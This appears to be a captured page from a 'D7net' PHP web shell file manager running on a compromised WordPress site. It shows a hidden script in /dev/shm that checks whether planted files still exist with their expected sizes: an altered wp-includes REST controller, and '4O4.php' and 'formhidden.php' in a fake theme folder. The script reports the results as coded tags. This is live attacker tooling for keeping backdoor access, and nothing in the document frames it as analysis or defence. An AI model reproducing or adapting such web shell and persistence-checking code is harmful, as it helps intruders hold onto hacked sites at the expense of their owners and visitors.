D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
thread-self
/
root
/
dev
/
shm
/
Filename :
.elem
back
Copy
<?php $r = '/home/niagarareflex/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@2451807@@56", "/wp-content/themes/custom_functions_1757847482/4O4.php"=>"bd@@459614@@967", "/wp-content/themes/custom_functions_1757847482/formhidden.php"=>"bd@@2459066@@970"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');